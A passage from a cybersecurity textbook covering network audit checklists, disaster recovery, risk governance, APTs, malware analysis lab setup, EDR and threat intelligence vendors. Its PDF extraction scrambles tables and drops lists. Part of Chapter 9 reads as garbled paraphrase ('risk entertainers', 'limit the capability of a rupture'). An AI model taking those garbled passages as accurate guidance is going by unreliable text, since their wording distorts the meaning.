The last column gives you an idea of how to leverage the comprehensive checklist. This is
only a sample list and you may end up with a much more comprehensive and detailed list
based on the scope and depth of the audit:
Audit Evidence
# Area Relevant Review
Requirements Required
Existing low-level
network
architecture
Study the network
diagrams for the
architecture,
existing sites and
including the IP
new sites. This
scheme, router Design and architecture
1 Pre-implementation highlights the IP
configuration, review
scheme, router
IPsec encryption,
configuration,
and routing
IPsec encryption,
protocols.
routing protocols,
and design and
architecture.
The number of
existing/upcoming
branches wherein
Design and
the network
implement
implementation
upcoming branch
was performed.
offices to ensure Design and architecture
2 Pre-implementation Existing low-level
the redundancy review
network
and availability of
architecture
the network links
diagram
and components.
highlighting
redundancy and
availability.
[ 247 ]
Performing Network Auditing Chapter 7
List of devices
configured during
the quarters with
Business traffic
an AES-128 or
should be
higher algorithm.
encrypted by IPsec Network infrastructure
3 Implementation Configuration
using the AES -128 security
snapshot stating
algorithm or
configuration of an
higher.
AES-128 or higher
algorithm on
devices.
Implementation
status of the DDoS
Prevention protection system
mechanism for for all the
Denial of Service networks.
(DoS)/Distributed Reports on the Network infrastructure
4 Implementation
DOS attacks implementation of security and monitoring
(DDoS) such as a DDoS protection
control plan system, if any
DoS/DDoS attacks. (SIEM integration
reports, incident
report, and so on).
List of devices
configured during
A strong hashing the quarters with
encryption SHA-2 for
algorithm should authentication.
be used for Configuration of Network infrastructure
5 Implementation
authentication; for the snapshot security
example, SHA -2 stating the
(160 bits key size or configuration of
more). SHA-2-based
authentication for
devices.
[ 248 ]
Performing Network Auditing Chapter 7
A centralized
access control
Process of
mechanism should
onboarding Network infrastructure
6 Implementation be in a place such
network and security
as TACACS and
security devices.
RADIUS to access
these devices.
All devices should
be time-based and
synchronized with Snapshot for NTP
the customer's settings Network infrastructure
7 Implementation
existing NTP configuration on security
server. The details network devices.
of this will be
provided.
To implement
IPsec, you need
encryptions on
existing routers, as
well as new
routers. The
implementation
Relevant Network infrastructure
8 Configuration includes installing documentation. security
the hardware,
configuring the
router, and
creating IP
tunneling, testing,
monitoring, and so
on.
[ 249 ]
Performing Network Auditing Chapter 7
Responsible for
providing network
device security
features such as
MAC binding and
Relevant Network infrastructure
9 Configuration port blocking. documentation. security
These features will
be configured
according to the
customer's access
control policies.
Maintain and
ensure adequate
ITSM report on the
support for all
list of devices
equipment that has
Incidents and present within the
already either Infrastructure monitoring
10 operations application, along
reached EOL, EOS, and management
management with the EOL,
or end of warranty
EOS, and AMC
through an Annual
details.
Maintenance
Contract (AMC).
A detailed
inventory of all the
equipment that has
been deployed and
is held as spare,
along with
complete
information such Physical
Inventory as site ID, Relevant inventory/configuration
11
management locations, documentation. management/infrastructure
configuration monitoring management
details, model,
serial number,
license key, service
coverage, and
contract details
such as EOL and
EOS.
[ 250 ]
Performing Network Auditing Chapter 7
Network devices
are monitored and
Relevant Network infrastructure
12 Patch management updated with the documentation.
security
latest firmware and
security patches.
Change request
forms for the
changes that are
carried out in
Document the
network devices.
changes and
13 Configuration Standard Configuration management
configuration that's
Operating
done on the device.
Procedure (SOP)
for change
management shall
be shared.
Availability of
functioning NOC
at a location and to Network infrastructure
14 NOC monitoring Physical visit.
provide onsite security
support on a 24/7
basis.
Implement the
following controls
at NOC to control
physical security:
The NOC should
be set up as a
separate area
Physical visit to
15 NOC monitoring dedicated to the Network infrastructure security
the NOC site.
operations area in
a separate zone,
which has no data,
people, or tools
that are shared
with an outside
entity.
Next, we will take a look at the NOC audit checklist and its various components.
[ 251 ]
Performing Network Auditing Chapter 7
[ 252 ]
Performing Network Auditing Chapter 7
[ 253 ]
Performing Network Auditing Chapter 7
[ 254 ]
Performing Network Auditing Chapter 7
This NOC audit checklist ties the requirements from the network monitoring checklist and
refers to the customer's policies, which are related to network security, wireless security,
and the network's industry standards, including network management, firewall security,
change management, business continuity, logging and monitoring, and so on. The
customer's policies and industry standards, such as ISO/IEC 27000:2018, are used as a basis
for the checklist.
Auditor Name:
Auditor Date:
[ 255 ]
Performing Network Auditing Chapter 7
Risk
# Activity Name Category Risk Rating Checklist
Category
Does the vendor have a
network policy that is
Managing and
aligned with the
monitoring the
customer's broad
customer's Vendor may
information risk policy
network and not be
and objectives? Is the
designing, following
1 Process High/Medium/Low vendor following
configuring, and secure
recognized network
implementing networking
design principles to help
additions and procedures
define the network
improvements for
security qualities for the
the network
perimeter and internal
network segments?
Have capabilities such as
network address
translation been
implemented to prevent
internal IP addresses
from being exposed to
Managing and
the external network and
monitoring the
attackers? Have the
customer's Vendor may
network intrusion
network and not be
detections and
designing, following
2 Process High/Medium/Low preventions tools been
configuring, and secure
placed on the network
implementing networking
where penetration tests
additions and procedures
and simulated
improvements for
cyberattack exercises
the network
had been conducted on
the infrastructure
regularly, to ensure all
security controls have
been implemented
correctly?
[ 256 ]
Performing Network Auditing Chapter 7
The preceding audit report can also consist of a column for recommendations that can be
made to the vendor to tackle any problems that might have come to light during the audit.
With this, we have finished looking at the network audit checklist. Now, you should be
aware of the various factors that go into auditing a network and be able to conduct an audit
yourself.
[ 257 ]
Performing Network Auditing Chapter 7
Best practices
Here are a few best practices that you, as a network auditor, must follow when auditing
your network:
[ 258 ]
Performing Network Auditing Chapter 7
You can refer to the organization's policy and industry standards as a starting
point to create the checklists.
Understand the stakeholders' structure in the organization. Without their
cooperation, the audit cannot be completed.
In the process of auditing, you may come across various other best practices that you
should include in the checklist and make a living document that gets updated with each
audit. This increases the efficiency of the audit process.
Latest trends
The latest technological advents, such as digital transformation, cloud computing, and
DevOps and DevSecOps, have been instrumental in driving innovation, scale, and speed
for businesses while also increasing the workload for network and security teams.
Resultant changes span complex multi-vendor, multi-technology, and hybrid cloud
environments. This has caused the need for network automation.
Now, we will take a look at some of the platforms that focus on the automation aspect of
network management, including SolarWinds Network Automation Manager, SolarWinds
NCM, and TrueSight Network Automation.
[ 259 ]
Performing Network Auditing Chapter 7
You can try out all its functionalities by applying for the 30-day free trial on the official
website.
SolarWinds NCM
SolarWinds NCM is one of the leading products on the market, with a wide range of
devices and configurations being supported by it. Some of its key features are as follows:
[ 260 ]
Performing Network Auditing Chapter 7
The following screenshot shows the results of a scan carried out by Solarwinds NCM:
However, there are some issues that can occur if you use it in a large environment. It is
known to have frequent unexpected timeouts. The configuration change templates have
certain restrictions, which some users may find limiting.
[ 261 ]
Performing Network Auditing Chapter 7
Some of the key benefits that organizations yield from its implementation include quick
identification and closure of vulnerabilities, cost-effectiveness, reliability, and speed of
operation, as well as compliance, real-time visibility, and streamlined configuration
management.
Summary
In this chapter, you understood network essentials such as risk management for industry
standards and governance frameworks such as SOX, HIPPA, GLBA, and PCI. We then
looked at various auditing process analysis platforms, including SolarWinds, Open-AudIT,
and Nmap. We also briefly looked at security assessment tools such as Nessus and Nipper,
as well as performance assessment tools such as Wireshark. We also went through a
comprehensive audit checklist that focused on the various attributes of a well-defined
network security audit. We then looked at a case study of a financial institution that had
outsourced its network management activity to a third-party vendor. Finally, we discussed
auditing best practices and the latest trends.
[ 262 ]
Performing Network Auditing Chapter 7
In this chapter, we learned about the requirements for initiating a network audit exercise
and the various dependencies. We also took a look at different risk management strategies
and industry standards that can be utilized by the auditor for guidance. Hopefully, this
chapter has helped you understand the role of an auditor and the different phases in an
audit process.
In the next chapter, we will take a look at continuous and effective threat management. We
will deep dive into topics such as cyber threat management, how to actively manage threats
and risk, and various management aspects of dealing with threats in an environment.
Questions
The following is a list of questions so that you can test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
1. Which of the following is a popular tool used for discovering networks, as well
as in security auditing?
Ettercap
Metasploit
Nmap
Burp Suite
2. Which of the following does Nmap not check?
Services that different hosts are offering
What OS is running
What kind of firewall is in use
What type of antivirus is in use
3. Wireshark is a tool that can be used for what?
Network protocol analysis
Network connection security
Connection analysis
Defending malicious packet filtering
4. Which of the following is a password recovery and auditing tool?
LC3
LC4
Network Stumbler
Maltego
[ 263 ]
Performing Network Auditing Chapter 7
Further reading
Take a look at the following resources to find out more about the topics we've discussed in
this chapter:
[ 264 ]
Performing Network Auditing Chapter 7
[ 265 ]
3
Section 3: Threat Management
and Proactive Security
Operations
In this section, you will find information pertaining to threat management and how to
transform your security program into a proactive security engine that runs for you 24/7. We
will look at concepts such as threat management and how this is going to help you
transform your security posture. You will learn about and understand security operations,
risk discussions with senior management, and how to translate risk in business terms. We
will also look at steps to develop a proactive security strategy, by means of which
companies can effectively assess risk and minimize the potential for a breach.
In this chapter, we will learn how to have a risk discussion with management and translate
risk into business terms. Our aim is to learn how to analyze a threat and gauge its business
impact so that we can communicate it to leadership with the help of appropriate terms. A
threat might mean different things to different segments of the organization. Hence, putting
the implications into perspective and validating the effectiveness of risk and control is
critical for a successful security program.
Technical requirements
To get the most out of this chapter, please familiarize yourself with the following before
you begin:
BCP/DR planning
Cyber risk assessment
Strategic governance frameworks
Cyber resilience
Governance, Risk, and Compliance (GRC)
Cyber perimeter establishment
Threat intelligence gathering
Continuous threat tracking
These methods, procedures, and technological disciplines can be separated into three
overlapping groups, as shown in the following diagram:
[ 268 ]
Continuous and Effective Threat Management Chapter 8
BCP/DR
BCP shows how a specific company continues to operate its business after something
disruptive occurs. It is the first step that defines the parameters (see the following list) that
will be used in the process of DR; for example, a cyberattack that leads to data loss. On the
other hand, a DR plan describes how a company/organization responds to an incident and
how it recovers after it's occurred.
[ 269 ]
Continuous and Effective Threat Management Chapter 8
On the other hand, the main issues that companies and organizations should take into
consideration when implementing a DR plan are budget, physical resources, human
resources, technologies, data, external influence (for example, media), geographical risks,
and legal factors. The following points should be kept in mind:
The difference between a failure and a disaster is that a disaster is physically and virtually
impactful, while a failure is just virtually impactful (most of the time). The following list
enumerates the possible disaster types that must be taken into consideration when building
a DR plan:
[ 270 ]
Continuous and Effective Threat Management Chapter 8
City disaster
National disaster
International disaster
Natural disaster (low chance of occurring)
DR plans are kept up to date through testing, which ensures that the plan is efficient and
works as intended in case of a service disruption. The following diagram describes the
various sections of a BCP/DR plan:
[ 271 ]
Continuous and Effective Threat Management Chapter 8
It is interesting to know that there are a few more specific DR plans available, such as
virtualized DR plans (for virtual machines), network DR plans (for the internal network
infrastructure), cloud DR plans (for the cloud; these are the most efficient from the
perspective of time and budget), and data center DR plans (for the infrastructure of data
center facilities).
To find out more about the specific DR plans that are available,
visit https://solutionsreview.com/backup-disaster-recovery/top-
three-types-of-disaster-recovery-plans/.
Threat sources
Threat events
Vulnerabilities
Exploitation conditions
Chance of an exploit occurring
Supposed impact
Risk score
The following table shows how risk can be divided into Low, Moderate, High, and Extreme
based on the likelihood and consequences:
[ 272 ]
Continuous and Effective Threat Management Chapter 8
If your organization or company wants to apply for cyber insurance, a cyber risk
assessment is something they must do. Cyber insurance helps the business stay financially
stable after a cyber attack or cybercrime occurs and impacts the organization/company.
Also, some industry niches have a risk assessment as an obligatory requirement before any
company will act in that domain (for example, HIPAA). The other reasons why a
company/organization must perform a cybersecurity risk assessment are as follows:
[ 273 ]
Continuous and Effective Threat Management Chapter 8
The following types of assessments are required and are part of a well-organized cyber risk
assessment:
It is recommended that you keep the cyber risk assessment plan up to date and revisit it
annually.
The key components when building a strategic governance framework are as follows:
Organization structure
Internal culture
Security awareness
Governance
The following are a few steps to help you build your cybersecurity governance framework:
1. Research and identify the external risks for your organization: This consists of
cyber attacks and the external entities behind those attacks.
2. Identify the internal exposure risks: This consists of employees that release
private, confidential, and valuable information accidentally (or not) on the
internet or through a phishing attack to a cybercriminal. The solution is to train
employees and help them develop a security awareness mindset.
3. Identify the ecosystem exposure risks: This consists of analyzing your
relationship with other companies that have access to your internal information
but have weak security. The reason for this is that attackers will indirectly gain
access to your internal information by exploiting your partner's security. The
solution is to choose a partner/company/vendor that has a strong focus on their
cybersecurity and information infrastructure.
[ 274 ]
Continuous and Effective Threat Management Chapter 8
Next, we will talk about cyber resilience and why it's an important aspect that every
organization should focus on.
Cyber resilience
The main purpose of cyber resilience is to maintain the business processes and operations
to ensure that a threat won't destabilize the entire company/organization. The four pillars of
cyber resilience are threat protection, recoverability, adaptability, and durability:
A cyber attack can have technical, financial, reputational, and social consequences. By
prioritizing cyber resilience, a company can lower the attack's impact and minimize the
consequences.
[ 275 ]
Continuous and Effective Threat Management Chapter 8
To implement full visibility in order to prioritize and remediate threats and risks
To implement risk control through continuous monitoring
To integrate a single efficient risk management program
To implement repeatable processes and cross-functional automation for
increased productivity
Now, we will discuss how to create a cyber perimeter and how it reinforces the cyber
defense capabilities of an organization.
Some foundational pillars that are essential for establishing a stable cyber perimeter are as
follows:
[ 276 ]
Continuous and Effective Threat Management Chapter 8
The need of the hour is to have clarity and transparency of what data is being processed
when, where, and by whom. A defense-in-depth approach sets a good foundation to
achieve that.
Strategic intelligence: "The big picture" of the capabilities and intents of the
threat, including the actors, tools, and equipment through pattern recognition.
This is mostly in the form of executive reports and advisories.
Operational intelligence: Focused on providing technical intelligence that will
supervise the detection and response activities, majorly focusing on Indicators of
Compromise or IOCs.
Tactical intelligence: The focus here is to observe and understand the Tactics,
Techniques, and Procedures (TTPs) of the threat actors. This provides a concrete
foundation for monitoring and response capabilities as they focus on the
mechanism of the attack rather than just the IOCs.
The three pillars that represent good intelligence gathering are data, shared intelligence,
and technical and threat research while leveraging internal or external reference points. In
the next chapter, we will talk about the various threat intelligence platforms and the value
that they bring to the organization.
[ 277 ]
Continuous and Effective Threat Management Chapter 8
[ 278 ]
Continuous and Effective Threat Management Chapter 8
So far, we've covered a long list of core concepts and techniques that you will come across
when dealing with threat management in your organization. Having a good understanding
of these will help you implement various strategies to manage threats to your network. In
the next section, we will dig deeper and understand what solutions we can adopt to deal
with threats that haunt our network.
Now, let us take a deep dive into each of these sections and understand how they help
improve the security posture of an organization.
[ 279 ]
Continuous and Effective Threat Management Chapter 8
UTM devices offer basic firewall solutions but also next-generation firewall
technologies that focus on reducing or eliminating exposure to external parties,
networks, or protocols that represent cyber threats.
UTM devices strengthen the security posture by detecting and preventing
attackers from accessing the network through effective methods such as malware
signatures, anomalies, reputation-based detection, and APTs using IDS/IPS.
[ 280 ]
Continuous and Effective Threat Management Chapter 8
UTM works through inspection methods and techniques such as inspection based on flow
and inspection based on proxy. In inspection based on flow, data samples to the UTM
device are structured so that they're validated as they pass to check for any malicious
interference in the data flow. The proxy-based inspection mode conducts an assessment of
the entire dataset by buffering the data and acting as a proxy before sending the data
through. Hence, it is a more thorough and comprehensive check than the one based on data
flows.
[ 281 ]
Continuous and Effective Threat Management Chapter 8
The main differences between a common cyber-attack and an APT are as follows:
Complexity.
Continuity (the attacker tries to remain inside for as long as possible).
Manually executed.
The main goal is to infiltrate the entire infrastructure rather than a single part of
the organization.
[ 282 ]
Continuous and Effective Threat Management Chapter 8
We will now take a look at the different stages that an APT goes through and the activities
that it conducts in those respective stages:
[ 283 ]
Continuous and Effective Threat Management Chapter 8
Based on the attack plan, the threat actor may conduct additional steps as needed.
However, the overall approach remains constant.
Well, how can you prevent such APTs? Read on to find out!
[ 284 ]
Continuous and Effective Threat Management Chapter 8
Now, let's move on and look at another method that can help us actively manage threats
and risk: malware analysis.
Malware analysis
The name "malware" refers to a group of malicious software created by cybercriminals to
gain unauthorized access to a network or a computer. For malware to work, it must be
executed on the attacker's target system. The different types of malware as follows:
[ 285 ]
Continuous and Effective Threat Management Chapter 8
Malware analysis is the process of learning how malware works and its impact on the
target. The reason organizations should have an internal capability for malware analysis is
to ensure that they are not dependent on third-party service providers for analysis. This is
time-consuming and requires exchanging potentially critical data pertaining to the
impacted network. There is also a lack of context and contextualization for the larger threat
campaign. The service provider may be able to perceive this as they will analyze the
malware as a silo, which makes it less insightful.
These steps ensure that due diligence is carried out in the process of dissecting the malware
while covering all the different aspects of the malicious code. Accurate inferences are
drawn from them. These steps are as follows:
1. Fully automated analysis: One of the fastest and easiest ways to discover the
behavior of a suspicious program or piece of software is to pass it through an
automated analysis tool that can output a report regarding application activity,
registry keys, and network traffic. It is perfect to get a first look at what's going
on, but it won't provide as much information as needed.
2. Static proprieties analysis: The second step is to extract the static proprieties,
such as header information, hashes, embedded strings, and resources. This is an
easy step because you do not have to run the malware to get that information.
[ 286 ]
Continuous and Effective Threat Management Chapter 8
2. Interactive behavior analysis: The next step consists of putting the malware in a
controlled environment and manually analyzing its behavior and actions.
3. Manual code reversing: The last step is harder and implies the process of
reverse-engineering the malware's code to determine the actual logic and other
capabilities of the malicious application. It involves using debuggers and
disassembler tools.
The basic security protections that must be implemented to mitigate the risk of malware
infection are as follows:
Next, we will take a look at how to set up a malware analysis lab and get started with the
process.
[ 287 ]
Continuous and Effective Threat Management Chapter 8
With these questions in mind, let's go ahead and set up our lab environment so that we can
get started with our malware analysis.
The first requirement after installing a virtual machine is to choose which operating
system should be installed. Certain guidelines for choosing the operating system are as
follows:
[ 288 ]
Continuous and Effective Threat Management Chapter 8
Sometimes, malware doesn't run on older systems because they don't fulfill
certain requirements. For example, .NET 4.5 is not supported for Windows XP.
So, the malware has to concentrate on .NET malware, Windows 7 or newer can
be installed.
Once we have decided on which operating system to use, we need to configure our
network settings. It is important that the network of the virtual machine is isolated because
some samples can infect other machines over the network. It is recommended to have no
network connection at all. Some samples need a connection because they use the internet to
download additional malware or to communicate with command and control servers. If
you need to analyze this behavior, fake the internet by setting up INetSim on the virtual
machine.
Create the victim virtual machines: Create two victim virtual machines running
Ubuntu and Windows 7.
Create the analysis machine: The analysis machine will be another virtual
machine running REMnux (https://remnux.org/), a Linux toolkit built
specifically for reverse engineering and analyzing malware. There are scenarios
where malware won't run at all if it hasn't enabled network access. To counter
this, tools such as INetSim (https://www.inetsim.org/) will be installed on the
analysis machine to simulate common internet services.
[ 289 ]
Continuous and Effective Threat Management Chapter 8
In order to accomplish this, we will utilize the VirtualBox internal network, which will
prevent it from communicating with the host machine at all times.
The following behavioral analysis tools will be installed on this machine to start with:
If additional security is required, another virtual machine with Security Onion installed on
it can be deployed from which access to the victim and analysis machines can be enabled.
[ 290 ]
Continuous and Effective Threat Management Chapter 8
Next, we will look at EDR as a process and the value it brings to the organization through
its proactive security measures.
Incident investigation.
Detect suspicious or anomalous activity.
Alert triaging and validation of Root Cause Analysis (RCA).
Threat hunting and data collection via sensors.
Block malicious executions.
Fast and accurate responses.
[ 291 ]
Continuous and Effective Threat Management Chapter 8
An EDR system can be implemented in many ways, but the three most frequently seen
modes are as follows:
The recommended technique is the third option because it is more innovative, cheaper, and
effective.
[ 292 ]
Continuous and Effective Threat Management Chapter 8
Improved troubleshooting
Hardware/software inventory
Easy to use centralized management system
Now that we have understood all the different solutions and services that organizations can
employ to actively manage threats and risks in the environment, let's address the best
practices pertaining to threat management.
[ 293 ]
Continuous and Effective Threat Management Chapter 8
Now, we will take a look at the more strategic aspects of threat management with respect to
executive leadership engagements and how to address this.
Many cybersecurity professionals have entered the domain, including those with
traditional IT, networking, and software development backgrounds, such as developers,
network engineers, and system admins. Therefore, if they have not gained hands-on
experience with security concepts and operations from the ground up, then the level of
expertise and the "hacker mindset" is often found missing, which results in running security
as just simply another operational or service domain. It is important that, irrespective of the
level or designation, everyone in the security team has hands-on experience and knowledge
of the inner workings of the security platforms and how they add value to the business
objectives.
[ 294 ]
Continuous and Effective Threat Management Chapter 8
The current institutional and certification programs are mostly concentrated on technical
aspects of coding and software development, networking, system administration
operations, and cybersecurity – with an emphasis on technology. Unfortunately, there is a
lack of an overall strategic approach to what is being done, why, and how it is improving
the security posture. Many major breaches have resulted due to the lack of a strategic
approach to information security, lack of training the team appropriately, and getting the
right people in the right roles.
Next, we will talk about the skills required to convey tactical aspects such as operational
risk and threat management to leadership.
[ 295 ]
Continuous and Effective Threat Management Chapter 8
When discussing this with management, the conversation should focus on points such as
the risk that the business inherently has and how we can mitigate this to evade an adverse
impact on the organization. This can range from loss of confidential information and loss of
productivity due to business disruption to reputational damage and regulatory and
compliance penalties.
The global average cost of cybercrime is rising every year and is estimated
to cross the current $2 billion estimation soon. You can find out more
at https://www.juniperresearch.com/researchstore/innovation-
disruption/cybercrime-security.
[ 296 ]
Continuous and Effective Threat Management Chapter 8
The following strategies must be followed by a CISO so that they can be comprehended by
all the C-level suites:
Speak a language the board can understand: It is important to map the technical
issues and solutions to business aspects and terms.
Focus on prevention, detection, response, and recovery: Make a clear matrix of
what you have in each section, as well as what needs to be improved. This instills
confidence in the program and brings clarity.
Align with key business objectives and goals: Security should be
complementary to the business and support the business, not the other way
around.
Understand the priorities of the board: The budget may always be a problem, so
learn to make the best of what is available.
Avoid going too deep into the technical details: You will quickly lose the
audience if they don't understand what you are preaching.
Talk more about risk and potential losses: Make it clear what the risks are, as
well as the consequences of not fixing them. That way, the board will be able to
make well-informed decisions in accordance with the tolerable risk limit.
Address the security skills needed and the security gaps: They should
understand the gaps and the requirements needed for the security program to
succeed.
Talk about strategies and plans: Make your vision and mission clear and
concise.
Build relationships beyond the boardroom: It's important that the board sees
you as an ally and partner of the firm and not just a sales guide for the security
team. Ensure you have strong interpersonal relations.
Next, we will discuss the business aspect of cybersecurity and its increasing importance
due to the evolution of information technology and the business models of organizations.
[ 297 ]
Continuous and Effective Threat Management Chapter 8
The general perception is that, with enough financial support and staffing, any
organization can be hack-proof, but in reality, that is not the case. CISOs should make it
transparent to the management team what security risks the business faces, the controls
that are implemented, and the residual risks that exist. This helps in setting up a reality
check regarding the management team's expectations. Most organizations take measured-
risk decisions at various business engagements. Therefore, CISOs should provide clarity
and help leadership gauge their risk appetite and risk tolerance levels.
CISOs should always discuss risk in terms of how it impacts the business and operations, as
well as the proposed mitigation and associated costs that will lead the board/executive
leadership to more appropriately decide on (setting) the acceptable risk level for the
organization based on each case and the way forward to address the risk.
When using a risk assessment approach, ensure that it is simple, concise, and links to
business outcomes and value proposition. In doing so, the security leader will be able to
showcase the business value that mitigating the risk enables.
Summary
In this chapter, you understood the essence of what it means to develop, sustain, and
initiate cyclic improvements to form a continuous and effective threat management
program. We began with a few threat management concepts, followed by solutions to
actively manage risks and threats. This was followed by some details on addressing
security leadership concerns. All of the segments we discussed in this chapter may not
always be under your purview, but it's important to understand and acknowledge the fact
that they are crucial parts to constructing a formidable security posture for any
organization, irrespective of its size, business vertical, and operations.
[ 298 ]
Continuous and Effective Threat Management Chapter 8
You can now leverage this knowledge to inculcate cyber threat management principals
such as risk assessment, strategic governance, and cyber resilience, all of which are long-
term programs aimed at future-proofing the organization from evolving cyber threats. You
can also implement actionable threat management operational attributes such as UTM,
APT, malware, EDR, vulnerabilities, and patch management, which are ongoing initiatives
focused on strengthening the response capability against adversaries. Finally, we learned
how to translate risks and threats to the management team, as well as how to get their buy-
in and support for our programs.
In the next chapter, we will take a look at proactive security measures and learn about
solution implementations for security measures such as threat intelligence, threat hunting,
and deception technology. This will help us form a proactive security outlook. We will also
discuss security platforms such as SIEM, which form the basic security foundation for
incorporating the aforementioned technologies.
Questions
The following is a list of questions you can use to test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
[ 299 ]
Continuous and Effective Threat Management Chapter 8
Further reading
Take a look at the following links to find out more about the topics that were covered in
this chapter:
[ 300 ]
Continuous and Effective Threat Management Chapter 8
[ 301 ]
9
Proactive Security Strategies
As technology quickly advances, the unpredictability of securing that technology increases
exponentially. Threats and risks are bringing forth progressively complex issues. As the
number of technologies that are being made keeps expanding year upon year, attackers are
also searching for a more prominent pool of potential exploits and targets. This change
implies that the digital security systems of associations need to develop to be aware of their
foes and need to remain one step ahead of the threat actors.
In the pursuit of this proactive security measure, the industry has come up with various
technological advancements to aid the security teams in catching up with the evolving
threats, maintaining situational awareness, and developing the capability to respond to
them proactively in their environment. In this chapter, we will discuss these solutions and
see how they add value to security operations and help protect our organizations.
We will be taking a look at some of the fundamental security measures needed to transform
the security posture into a more proactive outlook such as threat intelligence, where we will
discuss global threat intelligence providers, as well as targeted threat intelligence
providers. We will talk about the need for threat hunting, the MITRE ATT&CK framework,
and two top threat hunting platforms. We will also talk about the need for deception
technology and SIEM, and the value that they bring to the table.
Technical requirements
To get the most out of this chapter, please familiarize yourself with the following topics
before you begin:
Key considerations
Here are a few steps to be carried out when you start moving to a proactive security
strategy:
Prepare: Know what to protect and know the threats. Define a defense strategy
and target capabilities.
Detect: Obtain actionable visibility into attacks and other security incidents by
using monitoring and analytics to detect both known and unknown vectors.
Protect: Harden the organization to make cyber attacks difficult and more costly
to execute.
Respond: Know how to effectively respond to incidents and breaches, as well as
perform recovery.
[ 303 ]
Proactive Security Strategies Chapter 9
Thus, cyber threats are becoming more complex and efforts need to be put in place by each
and every stakeholder to mitigate them. So, what options do we have? Let's take a look.
[ 304 ]
Proactive Security Strategies Chapter 9
By following a few steps to build up a proactive security system, organizations can viably
evaluate chance and limit the capability of a rupture, without hindering the client's
experience. These steps are as follows:
1. Ensuring you can perceive all the association's benefits: To more readily
comprehend where threats can arise, associations need to know how clients are
coming across to corporate resources. Keeping that in mind, IT groups ought to
embrace a stage that perceives and sees the gadgets and systems that workers are
utilizing – you can't secure what you can't see. An essential for any fruitful
security system is the capacity to decisively – and rapidly – perceive possible
suspicious movement.
[ 305 ]
Proactive Security Strategies Chapter 9
Managing increasingly complex threats and their risks demands the need for a
strategic approach to cybersecurity policies and overall extensive preparation,
not just the implementation of security mitigation tools in Silos.
All in all, there are numerous difficulties that organizations must face to guarantee their
information security systems are reasonable for the present risk condition. A blend of threat
knowledge, innovation, and business perspective is required to empower the executives,
yet the majority of this requires some serious energy and exertion from experienced staff
who have dealt with similar challenges. Due to the lack of such abilities, this asset is
becoming more expensive and increasingly harder to keep up with, especially on the off-
chance that you intend to screen your systems throughout the day, consistently.
[ 306 ]
Proactive Security Strategies Chapter 9
So far, we have understood the evolving security challenges that organizations face and got
the gist of how we can build a proactive security strategy. Next, we will delve into the
concept of threat intelligence, how it works, and a few platforms that will help us get the
job done.
Threat modeling:
Threat analysis:
Analyze threats.
Normalize and standardize threats.
Correlate with the threat model to prioritize threats.
Determine the appropriate threat response to be taken.
[ 307 ]
Proactive Security Strategies Chapter 9
Threat insight arrangements accumulate crude information about rising or existing risk
entertainers and threats from various sources. This information is then investigated and
separated to deliver threat intelligence feeds and board reports that contain data that can be
utilized via computerized security control arrangements. The main role of this sort of
security mechanism is to keep organizations and decision-makers educated regarding the
evolving and emerging threats, including zero-day threats and threat campaigns, and how
to act against them.
[ 308 ]
Proactive Security Strategies Chapter 9
While threat intelligence is actualized well, it can help in accomplishing the following
things:
As security vendors move over one another to address the buyer's interest in assisting with
the developing number of threats, the market is currently full of risk insight instruments.
Now, not all platforms are made equivalent. For this degree of security to function
admirably, it must carry out its responsibility every time consistently, searching the huge
and diverse span of online materials for potential security threats. The major tools and
platforms that we are going to discuss are as follows:
Threat intelligence, as a service, has a different level of usefulness, so it's important to know
which service focuses on mitigating the threats/risks that you face as an organization. For
example, if you are a pharmaceutical company that is receiving threat intelligence data
pertaining to financial verticals, then chances are you may not see many hits or much that's
of any value. But at the same time, you could have a targeted threat intelligence program
that specifically caters to the needs of your organization. For example, you could be selling
goods on the dark web marketplace or using a phishing campaign to lure the recipient into
buying counterfeit products from your company at a very cheap rate. These are far more
relevant because of the threats that are likely to impact your organization and
industry vertical.
[ 309 ]
Proactive Security Strategies Chapter 9
Analyze: Assess intelligence for actionability and add insights to increase speed
and improve the confidence of actionability.
Communicate: Share enriched threat intelligence internally and externally.
Similarly, having a threat intelligence program but having no idea how to use it or what to
do with that intelligence is as good as not having it. This is where threat hunting and SIEM
will come into the picture, which we will discuss shortly. So, the overarching idea is to
understand the threats that you face, and then take the time to formulate a strategy that
focuses on proactive detection and prevention, rather than the age-old reactive action plan.
FireEye iSIGHT
IBM's X-Force Exchange
IntSights's Enterprise Threat Intelligence & Mitigation Platform
Digital Shadows's SearchLight
FireEye iSIGHT
FireEye iSIGHT is a front runner in the threat intelligence domain. They offer tactical,
operational, and strategic intelligence to various organizations and government entities
alike. Their in-depth knowledge of adversaries and tracking Advance Persistent Threats
(APTs) is industry-wide. The following are some of its advantages:
[ 310 ]
Proactive Security Strategies Chapter 9
FireEye, through iSIGHT, provides near real-time intelligence that's the result of its 150+
threat researchers and analysts from more than 20 countries across the globe. It also makes
use of machine intelligence to process intelligence from its 16+ million virtual machine
sensors.
IBM X-Force's machine-generated intelligence provides the latest inputs for prevalent
threats and also enables the analyst to check the reputation of any suspicious file, hash,
URL, domain, or IP. The following is a screenshot of IBM X-Force's dashboard:
[ 311 ]
Proactive Security Strategies Chapter 9
Some of the features on their portal are available for free, which is a good starting point.
But before we can perform in-depth analysis, we have to subscribe to their threat
intelligence service, such as their cloud-based threat intelligence engine.
[ 312 ]
Proactive Security Strategies Chapter 9
They have one of the most impressive and user-friendly dashboards on the market, as
shown in the following screenshot:
[ 313 ]
Proactive Security Strategies Chapter 9
It produces very minimal false positives while producing actionable results pertaining
to fake or malicious social media accounts, crawling the dark web for sale of products or PII
information, leaked passwords, and internet-facing service misconfigurations.
SearchLight has the capacity to search across code repositories, social media platforms,
mobile app stores, online file storage and content sharing portals, IRC and chat
applications, TOR sites, breach and exploits forums, and so on, which enables organizations
to proactively detect and mitigate threats. The following is the main dashboard of Digital
Shadows:
[ 314 ]
Proactive Security Strategies Chapter 9
To summarize, in this section, we've talked about the major players in the threat intel
domain and the value that each will add to your security portfolio. Overall, the idea should
be to select a vendor that provides organization-centric actionable threat intel so that you
can make better decisions and detect threats while also planning an effective breach
response. Typically, such a service should have red teaming capabilities, brand monitoring,
a takedown service, compromised assessment for the deep and dark web, as well as
vulnerability management capabilities. From a monitoring perspective, they should be able
to tap into the dark web and hack forums/marketplaces, pastebins/IM/IRC groups, detected
domains, and social media sites.
This should all be prioritized, analyzed, validated, and contextualized for consumption,
making it actionable and meaningful. Each of these factors can be broken down into further
sections, but a demo/Proof of Concept (POC) will be best so that you can evaluate their
